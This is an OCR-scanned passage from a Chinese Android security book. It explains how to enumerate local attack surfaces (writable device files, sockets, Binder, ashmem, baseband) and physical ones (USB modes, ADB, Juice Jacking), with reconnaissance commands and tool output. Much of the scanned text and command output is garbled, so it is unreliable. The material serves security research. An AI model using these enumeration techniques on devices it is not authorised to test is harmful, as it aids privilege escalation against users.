代码 进行 直接 交互 的 访问 点 。 许 多 用 户 空 间 的 组 件 ， 如 特权 服务 ， 通 过 PF_UNIX 族 的 套 接 字 暴 
露 进 程 间 通 信 功 能 。 甚 至 , 一 些 普通 文件 与 目录 条 目 如 果 没 有 进行 充分 的 权限 限制 , 也 会 为 几 种 
攻击 类 型 提供 攻击 路 径 。 在 文件 系统 中 简单 地 检查 这 些 条 目 , 你 就 可 以 找 出 这 些 端 点 , 审查 它们 
之 下 的 攻击 面 ， 并 潜在 地 提升 你 的 权限 。 

每 个 文件 系统 条 目 都 拥有 几 个 不 同 的 属性 。 首 先 最 为 重要 的 是 , 每 个 条 目 拥 有 一 个 属 主 用 户 
与 用 户 组 ,第 二 重要 的 是 条 目的 权限 ,这 些 权 限 指明 了 这 个 条 目 是 否 只 能 被 属 主 用 户 和 用 户 组 读 、 
写 、 执 行 , 还 是 可 以 被 系统 上 任意 用 户 读 、 写 、 执 行 。 此 外 ,一些 特 殊 的 权限 控制 着 一 些 依赖 于 
文件 类 型 的 行为 。 例 如 ， 一 个 可 执行 文件 如 果 设 置 了 set-user-id 或 者 set-group-id， 那 么 它 将 以 提 
升 后 的 权限 执行 。 最 后 ,每 个 条 目 有 一 个 类 型 ， 告 知 系统 如 何 对 这 个 端点 的 操作 进行 处 理 ， 类 型 
包括 常规 文件 、 目 录 、 字 符 设 备 、 块 设备 、FIFO 节点 、 符 号 链接 和 套 接 字 等 。 在 确定 哪个 攻击 
面 对 于 给 定 访问 级 别 可 达 时 ， 需 要 考虑 所 有 这 些 属 性 ， 这 是 非常 关键 的 。 

可 以 很 简单 地 使 用 opendir 与 stat 系统 调用 ， 来 枚 举 文件 系统 条 目 。 然 而 一 些 目 录 并 不 
允许 低 权限 用 户 来 列举 出 它们 的 内 容 (也 就 是 缺少 read 权限 位 )。 在 这 种 情况 下 ， 只 能 使 用 root 













































































































































































































































































5.5 本 地 攻击 面 129 





权限 来 枚 举 文件 系统 。 为 了 更 容易 地 确定 哪些 文件 系统 条 目 更 值得 关注 ，Joshua J. Drake 开发 了 
一 个 名 为 canhazaxs 的 工具 。 以 下 代码 片段 显示 了 这 一 工具 在 一 部 运行 Android 4.4 的 Nexus 4 上 
执行 后 的 效果 。 


root@mako:/data/local/tmp # ./canhazaxs -u shell -g \ 
1003,1004,1007,1009,1011,1015,1028,3001,3002,3003,3006 /dev /data 

*] uid=2000 (shell), 

groups=2000 (shell),1003 (graphics),1004(input),1007(1o0g),1009 (mount),1011 
(adb), 

1015(sdcard_ rw),1028 (sdcard_r),3001 (net_bt_admin),3002 (net_bt),3003 (inet), 
3006 (net_bw_stats) 

*] Found 0 entries that are set-uid executable 

*] Found 1 entries that are set-gid executable 

directory 2750 system shell /data/misc/adb 

*] Found 62 entries that are writable 














file 0666 system system /dev/cpuctl/apps/tasks 


chardev 0666 system system /dev/genlock 





socket 0666 root system /dev/socket/pb 


directory 0771 shell shell /data/local/tmp 














传递 给 canhazaxs 的 -u 和 -g 选项 ， 分 别 代表 在 确定 条 目 是 否 可 读 、 可 写 、 可 执行 时 ， 所 需 
考虑 的 用 户 和 用 户 组 。 在 这 些 选项 之 后 ， 可 以 指定 要 审查 的 任意 数量 的 目录 。 对 于 每 个 目录 ， 
canhazaxs 会 递归 枚 举 其 中 的 所 有 子 目 录 。 在 审查 完成 之 后 ， 可 访问 的 条 目 会 以 潜在 影响 程度 进 
行 优先 级 排序 显示 。 对 于 每 个 条 日，canhazaxs 会 显示 它 的 类 型 、 权 限 、 用 户 、 用 户 组 和 路 径 。 
这 个 工具 让 枚 举 文件 系统 所 暴露 攻击 面 的 过 程 变 得 简单 。 

找到 每 个 端点 背后 的 代码 则 取决 于 条 目的 类 型 。 对 于 内 核 驱 动 , 通过 特定 条 目的 名 称 来 搜索 
内 核 源 代码 是 最 好 的 方法 ， 这 一 点 我 们 将 在 第 10 章 中 进一步 讨论 。 而 对 于 任意 给 定 的 普通 文件 
或 目录 ,要 想 找 出 操作 它们 的 代码 异常 困难 。 然 而 通过 审查 initrc 文件 与 相关 指令 ， 在 过 去 人 们 
已 经 发 现 了 好 几 个 权限 提升 漏洞 。 确定 一 个 套 接 字 端 点 背后 的 代码 也 是 非常 需要 技巧 的 , 稍 后 将 
详细 讨论 。 找 到 这 些 代 码 后 ,你 可 以 确定 端点 所 提供 的 功能 。 在 这 些 端 点 之 下 的 深入 攻击 面 , 代 
表 着 发 现 未 知 权限 提升 漏洞 的 机 会 。 


5.5.2 ”找到 其 他 的 本 地 攻击 面 


并 非 所 有 的 本 地 攻击 面 都 是 由 文件 系统 条 目 暴 露 的 , 其 他 的 本 地 攻击 面 是 由 Linux 内 核 暴 露 
的 ， 包括 系 统 调用 和 套 接 字 实 现 等 。Android 系统 中 的 许多 服务 和 应 用 通过 不 同类 型 的 IPC ( 包 
括 套 接 字 与 共享 内 存 ) 暴露 着 本 地 攻击 面 。 

1. 系统 调用 

Linux 内 核 拥 有 一 个 暴露 给 本 地 攻击 者 的 丰富 攻击 面 。 除 了 文件 系统 条 目 所 代表 的 攻击 面 之 
外 ，Linux 内 核 在 执行 系统 调用 时 还 会 处 理 一 些 潜在 的 恶意 数据 。 因 此 ， 内 核 中 的 系统 调用 处 理 
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函数 代表 着 一 个 值得 关注 的 攻击 面 。 要 想 找到 这 些 函 数 ， 可 以 简单 地 在 内 核 源 代码 中 搜索 
SYSCALL_DEFINE 字符 串 。 

2. 套 接 字 

Android 上 运行 的 软件 使 用 了 各 种 不 同类 型 的 套 接 字 来 进行 IPC。 为 了 全 面 理解 由 各 种 不 同 
类 型 套 接 字 所 暴露 出 的 攻击 面 , 你 必须 了 解 套 接 字 是 如 何 创建 的 。 套 接 字 是 用 socket 系统 调用 
创建 的 。 尽 管 在 Android 各 个 层次 上 使 用 了 多 种 抽象 来 创建 和 管理 套 接 字 , 但 这 些 抽象 最 终 都 会 
使 用 socket 系统 调用 。 以 下 摘自 Linux 用 户 手册 的 代码 片段 显示 了 这 个 系统 调用 的 函数 原型 : 

int socket (int domain, int type, int protocol); 

这 里 需要 了 解 的 关键 是 创建 一 个 套 接 字 需要 指明 域 、 类 型 和 协议 。 域 参数 最 为 重要 ， 因 为 它 
的 值 决定 了 协议 参数 如 何 被 解释 。 关 于 这 些 参数 更 详细 的 信息 ,包括 每 个 参数 所 支持 的 值 ， 可 以 
从 Linux 用 户 手册 的 socket 函数 部 分 找到 。 此 外 ， 也 可 以 通过 检查 /proc/net/protocols 文件 系统 
条 目 ， 来 确定 一 款 Android 设备 支持 哪些 协议 。 


shell@ghost:/data/local/tmp $ ./busybox wc -1 /proc/net/protocols 
24 /proc/net/protocols 


这 个 文件 中 每 个 条 目 都 代表 着 值得 进一步 探索 的 攻击 面 ， 而 实现 每 个 协议 的 源 代 码 可 以 从 
Linux 内 核 源 代码 的 net 子 目 录 下 找到 。 

通用 的 套 接 字 域 

大 多 数 Android 设 备 都 大 量 使 用 了 PF_UNIX、PF_INET 和 PF_NETLINK 域 的 套 接 字 。PF_INET 
域 的 套 接 字 又 被 进一步 分 为 SOCK_STREAM 和 SOCK_DGRAM 类 型 , 分 别 使 用 TCP 和 UDP 协议。 关于 
每 种 套 接 字 实例 的 状态 详细 信息 ， 可 以 从 /proc/net 目录 下 的 条 目 中 获取 ， 如 表 5-2 中 所 示 。 


表 5-2 通用 套 接 字 域 的 状态 文件 




























































































套 接 字 域 状态 文件 
PF_UNIX /proc/net/unix 
PF_INET (SOCK_STREAM) /proc/net/tcp 
PF_INET (SOCK_DGRAM) /proc/net/udp 
PF_NETLINK /proc/net/netlink 





第 一 个 也 是 最 常 使 用 的 套 接 字 域 是 PF_UNIX 域 , 许多 服务 通过 这 个 域 的 套 接 字 暴露 PC 功 
能 , 而 暴露 的 在 文件 系统 中 的 端点 可 以 使 用 传统 的 用 户 、 用 户 组 和 权限 机 制 进行 安全 加 固 。 因 为 
条 目 存 在 于 文件 系统 中 ， 所 以 在 使 用 5.5.1 节 中 讨论 的 方法 时 ， 就 可 以 发 现 这 种 类 型 的 套 接 字 。 

除了 传统 的 PF_UNIX 域 套 接 字 以 外 ,Android 实现 了 一 种 特殊 的 套 接 字 ， 称 为 “抽象 命名 空 
间 套 接 字 ”( Abstract Namespace Socket )。 几 个 核心 系统 服务 使 用 这 一 域 的 套 接 字 来 暴露 IPC 功 
能 。 这 些 套 接 字 与 PF_UNIX 套 接 字 是 类 似 的 ， 但 并 不 会 在 文件 系统 上 包含 一 个 条 目 ， 而 是 仅仅 
通过 一 个 字符 串 来 进行 标识 , 标识 字符 串通 常 采用 esocketName 的 形式 , 例如 , /system/bin/ 
debuggerd 程序 创建 一 个 名 为 Gandroid:debuggerd 的 抽象 套 接 字 。 这 种 套 接 字 在 创建 
PF_UNIX 套 接 字 时 ， 通 过 指定 NUL 字 节 作为 第 一 个 字符 来 创建 ， 随 后 的 字符 指明 了 套 接 字 的 名 
称 。 因 为 这 种 套 接 字 并 不 包含 文件 系统 条 目 ， 因 此 无 法 使 用 传统 PF_UNIX 套 接 字 的 那 种 方法 对 
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其 进行 安全 加 固 。 这 一 事实 让 抽象 套 接 字 端 点 成 为 值得 进一步 探索 的 有 趣 目 标 。 
任何 希望 与 互联 网 上 主机 通信 的 应 用 都 需要 使 用 PF_INET 套 接 字 。 在 少数 情况 下 ， 服 务 与 









































应 用 使 用 PF_INET 套 接 字 来 进行 耻 C 通信 。 前 面 已 经 介绍 过 ， 这 一 套 接 字 域 又 包括 使 用 TCP 协 
议和 UDP 协议 的 通 要 想 创 建 这 种 套 接 字 ， 进 程 必须 和 全 名 访问 inet 的 Android ID ( AID ), 
这 是 由 于 我 们 已 经 在 第 2 章 中 讨论 的 Android Paranoid Networking 特性 。 这 些 类 型 的 套 接 字 在 被 














IPC 通信 使 用 ， 0 都 是 值得 特别 关注 的 。 

Android 中 的 最 后 一 种 通用 套 接 字 是 PF_NETLINK 套 接 字 。 这 种 套 接 字 经 常用 于 内 核 空间 和 
用 户 空 间 之 间 的 通信 。 用 户 空间 进程 ， 如 /system/bin/vol9， 会 监听 从 内 核发 来 的 一 些 消息 ， 
然后 进行 处 理 。 在 第 3 章 中 讨论 过 , GingerBreak 漏洞 利用 代码 依赖 于 vola 服务 在 处 理 恶 意 构造 
的 NETLINK 消息 时 的 安全 漏洞 。 与 PF_NETLINK 套 接 字 相关 的 攻击 面 是 非常 值 得 关注 的 ， 因为 
它们 同时 存在 于 内 核 空间 和 特权 用 户 空间 进程 中 。 

找到 套 接 字 背后 的 代码 

在 一 个 典型 的 Linux 系统 中 ， 你 可 以 使 用 1sof 命令 或 者 带 有 -p 选项 的 netstat 命令 来 将 

进程 映射 到 套 接 字 上 。 遗憾 的 是 , 这 种 方法 在 Android 设备 上 并 不 是 立即 可 行 的 。 只 有 在 一 个 root 

过 的 设备 上 安装 一 个 恰当 构建 的 BusyBox 二 进 制程 序 后 ， 才 能 达成 这 一 任务 : 


root@mako:/data/local/tmp # ./busybox netstat -anp | grep /dev/socket/pb 
知 广 主演 "+ 这 [E39] DGRAM 5361 184/mpdecision 
/dev/socket/pb 


使 用 前 面 这 条 指令 ， 你 可 以 发 现 /dev/socket/pb 被 进程 号 为 184 的 mpdecision 进程 所 使 用 。 
如 果 没 有 恰当 构建 的 BusyBox, 你 可 以 通过 简单 的 三 步 来 完成 这 一 任务 。 首 先 , 你 需要 使 用 
proc 文件 系统 目录 中 的 特定 条 目 ， 来 找 出 拥有 这 一 套 接 字 的 进程 : 


root@mako:/data/local/tmp # ./busybox head -1 /proc/net/unix 

Num RefCount Protocol Flags Type St Inode Path 
root@mako:/data/local/tmp # grep /dev/socket/pb /proc/net/unix 
00000000: 00000002 00000000 00000000 0002 01 5361 /dev/socket/pb 


在 这 个 例子 中 , 你 可 以 查看 特殊 的 /proc/net/unix 文件 中 的 /dev/socket/pb 条 目 ， 路 径 前 面 的 那 
个 数字 是 文件 系统 条 目的 inode 编号 。 使 用 这 个 inode 编号 ， 你 可 以 看 到 哪个 进程 拥有 这 个 套 接 
字 的 打开 的 文件 描述 符 。 


root@mako:/data/local/tmp # ./busybox ls -1 /proc/[0-9]*/fd/* | grep 5361 


































































































J]rwxXx------— 1 root root 64 Jan 2 2273503 /proG/ L844/ fd 7 => 
socket: [5361] 


有 时 这 一 命令 会 显示 ,不 止 一 个 进程 在 使 用 这 个 套 接 字 。 但 是 幸运 的 是 ,在 这 些 情况 下 , 通 
常 都 能 很 明显 地 看 出 哪个 进程 是 使 用 套 接 字 的 服务 。 在 知道 进程 ID 后 ， 再 找 关于 这 个 进程 的 更 
多 信息 就 简单 了 。 

root@mako:/data/local/tmp # ps 184 


HoebR PIiD PPEID ‘Velo2E. Res WCHAN PG NAME 
root 184 和 7208 492 ffffffff jb6ea0908 S /system/bin/mpdecision 
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无 论 使 用 BusyBox 方 法 还 是 上 述 的 三 步 法 ， 你 现在 都 知道 从 哪里 开始 查看 代码 了 。 

套 接 字 代表 着 一 个 重要 的 本 地 攻击 面 , 因为 它 能 和 特权 进程 进行 通信 。 实现 了 不 同类 型 套 接 
字 的 内 核 空间 代码 可 能 会 导致 权限 提升 。 用 户 空间 中 暴露 出 套 接 字 端 点 的 服务 和 应 用 也 可 能 导致 
特权 提升 。 这些 攻击 面 代表 着 查找 安全 漏洞 值得 关注 的 位 置 。 通 过 定位 到 代码 , 你 可 以 更 近 距 离 
地 查看 这 些 攻击 面 ， 并 开始 对 更 深 攻 击 面 的 探索 旅程 。 

3. Binder 

Binder 驱动 及 依赖 于 它 的 软件 代表 着 Android 特有 的 一 个 攻击 面 。 之 前 已 经 在 第 2 章 中 提 到 
并 在 第 4 章 中 进一步 介绍 ，Binder 驱动 是 Intent 的 基础 ， 而 Intent 是 用 来 在 应 用 层 Android 组 件 
之 间 进 行 通信 的 。Binder 驱动 本 身 在 内 核 空间 中 实现 ， 并 通过 /devbinder 字符 设备 暴露 出 一 个 攻 
击 面 。 然 后 Dalvik 应 用 通过 基于 之 上 的 几 层 抽象 进行 相互 通信 。 尽 管 从 原生 应 用 发 送 Intent 不 被 
支持 , 但 可 以 直接 在 Binder 基础 上 实现 一 个 原生 代码 服务 。 因 为 Binder 可 以 被 以 多 种 方式 使 用 ， 
研究 更 加 深入 的 攻击 面 可 能 会 找到 最 终 导 致 权限 提升 的 安全 漏洞 。 

4. 共享 内 存 

尽管 Android 设备 并 不 使 用 传统 的 POSIX 共享 内 存 , 但 是 它们 包含 了 几 种 共享 内 存 机 制 。 与 
Android 中 的 许多 功能 类 似 , 是 否 支 持 某 种 特定 的 机 制 取 决 于 有 具体 的 设备 。 第 2 章 介绍 过 , Android 
实现 了 一 种 名 为 “匿名 共享 内 存 ”( 简称 ashmem ) 的 定制 共享 内 存 机 制 。 可 以 通过 查看 /proc 文 
件 系统 中 的 打开 文件 描述 符 ， 来 找 出 哪些 进程 正在 使 用 ashmem 机 制 进行 通信 。 

root@mako:/data/local/tmp # ./busybox ls -ld /proc/[0-9]*/fd/* | \ 

grep /dev/ashmem | ./busybox awk -F/ ‘{print $3}’ | ./busybox sort -u 

176 

3 二 89 

319185 

596 


686 
856 


除了 ashmem 机 制 ， 其 他 一 些 共 享 内 存 机 制 ， 如 谷歌 的 pmem、 英 伟 达 的 NvMap 和 ION, 只 
在 特定 的 一 组 Android 设备 中 存在 。 无 论 使 用 了 哪 一 机 制 ， 用 于 了 PC 的 共享 内 存 都 代表 着 一 个 潜 
在 的 攻击 面 。 

5. 基带 接口 

Android 智能 手机 中 包含 第 二 个 操作 系统 ， 也 就 是 基带 。 在 某 些 设 备 中 ， 基 带 运 行 在 一 个 完 
全 独立 的 物理 CPU 上。 在 其 他 设备 中 ， 它 则 运行 在 一 个 专属 CPU 核心 的 隔离 环境 中 。 无 论 是 哪 
种 情况 ，Android 操作 系统 必须 能 与 基带 进行 通信 ， 来 拨 出 和 接听 电话 ， 发 送 和 接收 文本 消息 、 
移动 数据 以 及 其 他 通过 移动 网 络 进行 的 通信 。 其 中 暴露 出 的 端点 依 设 备 而 不 同 , 被 认为 是 基带 本 
身 的 攻击 面 。 对 这 些 端点 进行 访问 通常 需要 提升 后 的 权限 ， 比 如 radio 用 户 或 用 户 组 的 权限 。 通 
过 查看 *ild 进程 ， 可 以 确定 基带 暴露 出 哪些 攻击 面 。 对 于 Android 手机 通信 栈 ， 也 就 是 对 基带 
访问 的 抽象 ， 我 们 将 在 第 11 章 中 详细 讨论 。 
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6. 攻击 硬件 支持 的 服务 

大 多 数 的 Android 设备 还 有 大 量 的 外 设 ,包括 GPS 接收 器 .环境 光 传感器 和 陀螺 仪 等 .Android 
框架 层 中 暴露 了 一 些 高 层 API， 让 Android 应 用 访问 由 这 些 外 设 提供 的 信息 。 这 些 API 也 代表 着 
值得 关注 的 攻击 面 , 因为 传递 给 它们 的 数据 会 被 一 些 特权 服务 甚至 外 设 自 身 进行 处 理 。 而 任何 给 
定 外 设 的 体系 结构 则 取决 于 不 同 的 设备 。 由 于 在 API 与 外 设 驱动 之 间 也 拥有 多 个 层次 , 因此 暴露 
出 的 API 攻击 面 也 是 说 明 更 深入 攻击 面 是 如 何 隐藏 于 浅 层 攻 击 面 之 下 的 好 案例 。 对 这 组 攻击 面 更 
彻底 的 审查 已 经 超出 了 本 书 的 范围 。 


5.6 ”物理 攻击 面 


需要 物理 接触 设备 的 攻击 被 认为 是 依赖 于 物理 攻击 面 , 物理 攻击 面 与 先前 提 到 的 物理 相 邻 并 
不 相同 , 物理 相 邻 只 需要 在 目标 特定 范围 之 内 ,而 不 需要 实际 接触 到 目标 。 使 用 物理 攻击 面 攻 击 
移动 设备 看 起 来 并 不 够 酷 炫 ,而 且 比 其 他 攻击 更 容易 。 事 实 上 , 大 部 分 人 认为 物理 攻击 是 不 可 能 
进行 防御 的 。 相 应 地 ， 你 可 能 会 将 这 类 攻击 归 为 严重 性 较 低 的 一 类 攻击 。 然 而 这 些 攻 击 会 导致 非 
常 严重 的 影响 ， 特 别 是 当 它们 可 以 在 非常 短 的 时 间 内 执行 ， 或 者 不 会 让 目标 用 户 发 觉 时 。 

在 过 去 几 年 里 , 研究 人 员 发 现 了 一 些 利用 物理 攻击 面 的 真实 攻击 方法 。 最 早 针对 iOS 设备 的 
几 次 越狱 都 需要 对 设备 有 USB 连接。 另外， 取证 分 析 人 员 严 重 依赖 物理 攻击 面 来 恢复 数据 ， 或 
者 暗中 获取 手机 的 访问 。2013 年 年 初 ， 研 究 人 员 发 布 了 一 个 报告 ， 详 细 说 明了 他 们 如 何 发 现 一 
些 公 共 手 机 充电 站 对 指定 设备 发 起 攻击 以 安装 恶意 软件 。 恶意 软件 安装 后 , 它 会 在 感染 的 移动 设 
备 连接 宿主 计算 机 时 尝试 攻击 计算 机 。 这样 的 攻击 案例 还 有 很 多 , 事实 上 物理 攻击 要 比 你 原本 以 
为 的 要 多 得 多 ， 也 严重 得 多 。 

为 了 对 物理 攻击 面 进 一 步 分 类 , 我 们 考虑 如 下 几 个 标准 。 首 先 , 我 们 确定 拆 解 目标 设备 是 否 
可 以 接受 。 拆 解 设备 有 损坏 的 风险 ， 因 而 是 不 可 取 的 。 虽然 如 此 ， 这 种 攻击 从 本 质 上 说 是 非常 强 
大 的 ,不 应 该 排除 在 外 。 接 下 来 ,我 们 来 分 析 不 需要 拆 解 设备 的 可 能 攻击 面 。 这 种 攻击 向 量 包括 
任意 的 外 设 访 问 ， 比 如 USB 端口 和 可 扩展 的 存储 媒介 (通常 是 microSD 卡 ) 插 柳 。 本 节 剩余 部 
分 会 讨论 这 些 攻击 向 量 以 及 它们 之 下 的 攻击 面 。 


5.6.1 拆 解 设备 


对 目标 设备 进行 拆 解 ,就 能 够 对 目标 设备 中 的 硬件 发 起 攻击 。 许 多 设备 制造 商 认 为 计算 机 硬 
件 和 电子 工程 的 神秘 感 足以 充分 保护 设备 。 因 为 拆 解 一 个 Android 设备 来 探测 所 暴露 的 攻击 面 ， 
需要 小 众 的 技能 和 专业 的 硬件 , 所 以 厂商 通常 不 会 充分 地 保护 硬件 。 因 此 ,研究 拆 开设 备 后 暴露 
的 物理 攻击 面 将 非常 有 利 。 打 开 一 个 硬件 设备 通常 会 发 现 : 

口 暴露 的 串口 ， 允 许 接收 调试 消息 ,或 者 在 某 些 情况 下 ， 提 供 设备 的 shell 访问; 
口 暴露 的 JTIAG 调试 端口 ， 人 允许 对 设备 的 固件 进行 调试 、 重 刷 或 访问 。 

极 少 数 情况 下 ,攻击 者 无 法 找到 这 些 通 用 接口 , 但 是 其 他 攻击 仍然 是 可 能 的 。 一 个 非常 实用 

和 真实 的 攻击 是 物理 性 地 移 除 闪存 或 核心 CPU ( 通常 包含 着 内 部 闪存 )。 一旦 被 移 除 ， 攻 击 者 可 
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以 轻易 地 从 设备 中 读 取 引导 装载 程序 、 启 动 配置 和 完整 的 闪存 文件 系统 ,攻击 者 完全 占有 设备 后 ， 
可 以 实施 许多 攻击 ， 这 些 只 是 其 中 的 一 部 分 。 

你 很 绊 运 ， 本 书 不 会 像 其 他 很 多 书籍 一 样 ， 只 是 泛泛 地 提 及 这 些 攻击 ， 而 是 在 第 13 章 中 详 
细 演 示 说 明 这 些 技 术 。 但 本 章 不 会 深入 介绍 这 些 物 理 攻 击 。 











5.6.2 USB 


USB 是 Android 设备 与 其 他 设备 进行 交互 的 标准 化 有 线 接口 ,尽管 iPhone 有 它 专属 的 苹果 连 
接线 ， 大 部 分 Android 设备 使 用 标准 化 的 micro USB 端口 ， 作 为 基础 的 有 线 接口 ，USB 暴露 了 几 
种 不 同类 型 的 功能 ， 这 些 功 能 与 Android 设 备 的 多 功能 性 是 直接 相关 的 。 

USB 接口 的 功能 取决 于 设备 处 于 什么 模式 , 或 者 在 设备 配置 中 启用 了 哪些 选项 ,通常 支持 的 
模式 有 ADB、fastboot、 下 载 模式 、 大 容量 存储 、 媒 体 设备 和 网 络 共享 等 。 并 非 所 有 的 设备 都 支 
持 所 有 模式 ， 有 些 设备 默认 启用 了 其 中 一 些 模式 ， 如 大 容量 存储 或 媒体 传输 协议 (MTP ) 模式 。 
其 他 USB 模式 ， 如 fastboot 和 下 载 模式 , 取决 于 在 启动 时 按 住 的 特定 组 合 键 。 此 外 ,一 些 设备 还 
有 一 个 菜单 ， 让 你 在 连接 USB 设备 时 选择 进入 哪 种 模式 。 图 5-7 显示 了 一 部 HTC One V 手 机 上 
USB 连接 类 型 的 菜单 项 。 



















































































呈 浊 十 国 01:06 


Choose a connection type: 





Charge only Disk drive 
Charge phone over Mountas disk drive 
USB 


1=, HTC Sync Manager 
J Sync music, photos, videos 


USB tethering 
《 罩 Share phone's mobile network ~ 
ith PC 


Internet pass-through 

















图 5-7 HTC OneV 手 机 的 USB 模式 菜单 


暴露 的 USB 攻击 面 取决 于 设备 处 在 哪 种 模式 或 启用 了 哪些 特性 。 对 于 所 有 模式 ， 引 导 装载 
程序 或 Linux 内 核 中 的 驱动 都 支持 USB 硬件 。 在 这 些 设备 驱动 上 层 ， 有 一 些 额外 的 软件 处 理 全 
用 各 类 功能 的 特定 网 络 协议 进行 的 通信 。 在 Android 4.0 之 前 ， 许 多 设备 默认 启用 大 容量 存储 模 
式 , 而 一 些 设备 需要 在 屏幕 上 单 击 一 个 按 乌 才能 启用 。Android 4x 及 之 后 版 本 完全 移 除了 对 大 容 
量 存储 模式 的 支持 。 在 此 之 前 ， 宿 主 计算 机 在 访问 SD 卡 时 ， 需 要 先 从 设备 印 载 /sdeard 分 区 ， 操 
作 起 来 非常 烦 项 。 于 是 ， 后 续 设备 默认 使 用 MTP 模式 。 
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1. 枚 举 USB 攻击 面 

在 文献 中 ，USB 设备 经 常 被 称 为 一 种 功能 ， 也 就 是 说 ，USB 设备 是 向 系统 提供 一 些 附 加 功 
能 的 。 实 际 上 ， 一 个 USB 设备 就 可 以 拥有 许多 不 同 的 功能 。 每 个 USB 设备 有 一 种 或 多 种 配置 ， 
而 每 种 配置 又 有 至 少 一 个 接口 。 一 个 接口 中 包含 一 组 端点 ， 这 些 端点 说 明了 与 特定 功能 进行 通信 
的 方式 。 数 据 只 能 单身 流出 或 流向 端点 ， 因 此 如 果 某 个 设备 功能 需要 进行 双向 通信 , 那么 它 必 须 
定义 两 个 端点 。 
使 用 像 1susb 这 样 的 工具 和 libusb 库 ,我 们 可 以 在 USB 所 连接 的 主机 上 进一步 枚 举 USB 所 
暴露 的 攻击 面 。1lsusp 工具 可 以 显示 出 一 个 设备 所 支持 的 接口 和 端点 的 详细 信息 。 以 下 代码 片段 
显示 了 在 一 部 HTC One X+ 手 机 上 ADB 的 接口 和 端口 。 


dev:~# lsusb -Vv -d 0bb4:0dfc 
Bus 001 Device 067: ID 0bb4:0dfc High Tech Computer Corp. 
Device Descriptor: 


bs 






































idVendor 0x0bb4 High Tech Computer Corp. 
idProduct 0x0dqfc 

bcdDevice 之 :32 

iManufacturer 2 HTC 

iProduct 3 Android Phone 
bNumConfigurations 汪 


Configuration Descriptor: 
bNumInterfaces 3 


Interface Descriptor: 








bNumEndpoints 2 
bInterfaceClass 255 Vendor Specific Class 
bInterfaceSubClass 66 
bInterfaceProtocol 中 
iInterface 0 
Endpoint Descriptor : 
bLength 
bDescriptorType 5 
bEndpointAddress 0x83 EP 3 IN 
bmAttributes 2 
Transfer Type Bulk 
Synch Type None 
Usage Type Data 





Endpoint Descriptor: 


bLength 时 
bDescriptorType 5 
bEndpointAddress 0x03 EP 3 OUT 
bmAttributes 2 
Transfer Type Bulk 
Synch Type None 


Usage Type Data 
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可 以 使 用 libusb 与 单一 端点 进行 通信 ， 


都 提供 了 支持 。 
Android 设备 在 一 个 USB 接口 上 同时 支持 多 种 功能 。 这 一 支持 机 制 被 称 为 “Multifunction 


Composite Gadget”, 
置 文件 中 找到 关于 支持 USB 模式 的 更 多 信息 ， 
详细 列 出 了 所 有 可 能 的 模式 组 合 以 及 相关 的 生产 厂商 和 产品 ID 。 以 下 是 和 








on property:sys.usb.config=mtp 
stop adbd 


wri 
wri 
wri 
wri 
wri 
wri 
wri 
wri 


US 
CS 
Le 
GS 
tS 
US 
Ce 


/sys/class/android us 
/sys/class/android_ us 
/sys/class/android us 
/sys/class/android us 
/sys/class/android us 
/sys/class/android us 
/sys/class/android us 





而 背后 的 软件 被 称 为 “Gadget 框架 ”"。 在 一 台 设 备 上 ， 
例如 Nexus 4 有 一 个 /init.mako.usb.rc 文件 , 该 文件 
耻 认 模式 的 条 目 。 





b/android0/enable 0 
b/android0/idVendor 18D1 
b/android0/idProgduct 4EE1 
b/android0/bDeviceClass 0 
b/android0/bDeviceSubClass 0 
b/android0/bDeviceProtocol 0 
b/android0/functions mtp 


你 经 常 可 以 从 init 配 


而 libusb 为 许多 高 级 编程 语言 ( 如 Python 和 Ruby ) 








GS 


/sys/class/android us 
setprop sys.usb.state S${sys 


上 述 片 段 告 知 init 进程 在 某 个 进程 


.局 





sb.config} 


各 sys.usb.config 


b/android0/enable 1 





属性 设置 为 mtp 时 如 何 响应 。 除 了 


停止 ADB 守护 进程 外 ，init 进程 还 需要 通过 /sys/class/android_usb 重新 配置 Gadget 框架。 


另外 ， 可 以 在 AOSP 代码 仓库 中 找到 Android 相 








示 了 在 frameworks/base 项 目 中 Android 支持 的 不 同 模式 。 


dev:~/android/source/framewor 








ks/bases git 














grep USB_FUNCTION_ 


core/java/android/hardware/usb/UsbManager.java:57: * <11> {@lin 
#USB_FUNCTION_MASS_STORAGE} boolean extra indicating whether the 
core/java/android/hardware/usb/UsbManager.java:59: * <1i> {@lin 
#USB_FUNCTION_ADB} boolean extra indicating whether the 
core/java/android/hardware/usb/UsbManager.java:61: * <li> {@lin 
#USB_FUNCTION_RNDIS} boolean extra indicating whether the 
core/java/android/hardware/usb/UsbManager.java:63: * "<1i> {@lin 
#USB_FUNCTION_MTP} boolean extra indicating whether the 
core/java/android/hardware/usb/UsbManager.java:65: * <li> {@lin 
#USB_FUNCTION_PTP} boolean extra indicating whether the 
core/java/android/hardware/usb/UsbManager.java:67: * 六 | COLT 
#USB_FUNCTION_PTP} boolean extra indicating whether the 
Core/java/android/hardware/usb/UsbManager.java:69: * <li> {@lin 








#USB_FU. 





CTION_AUDIO_SOURCE} boolean extra indicating whether 七 


ne 





匡 架 如 何 管理 USB 设备 的 1 


百 吃 \o 





息 。 以 下 片段 显 


对 在 USB 上 暴露 的 攻击 面 进行 次 和 人 挖掘， 取决 于 不 同 接口 所 支持 的 具体 功能 与 协议 。 这 超 
出 了 本 章 的 范围 ， 第 6 章 中 将 深入 介绍 其 中 的 一 个 接口 : 媒体 传输 协议 (MTP )。 


2. ADB 








用 于 开发 的 Android 设备 通常 启用 了 USB 调试 。 这 会 启动 ADB 守护 进程 , 后 者 允许 在 Android 
设备 上 以 特殊 权限 运行 命令 。 在 许多 设备 上 , 特别 是 运行 Android 4.2.2 之 前 版 本 的 设备 , 访问 ADB 
shell 并 不 需要 任何 认证 。 甚 至 ， 软 件 版 本 号 为 1.27.531.11 的 TMobile HTC One 手机 默认 暴露 了 无 
需 认 证 的 ADB ， 而 且 并 不 允许 关闭 它 。 可 以 想象 ， 获 取 设 备 的 这 种 访问 可 以 轻易 达成 一 些 有 趣 的 
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攻击 。 

安全 研究 人 员 Kyle Osborn 、Robert Rowley 和 Michael Miiller 演示 了 许多 种 利用 设备 ADB 访 
问 的 攻击 方法 。Robert Rowley 在 几 个 会 议 上 展示 过 Juice Jacking 攻击 ,在 这 些 攻击 中 ,攻击 者 可 
以 创建 出 手机 充电 站 ， 在 目标 手机 连接 USB 进行 充电 时 ， 可 以 隐蔽 地 下 载 目 标 手 机 上 的 数据 ， 
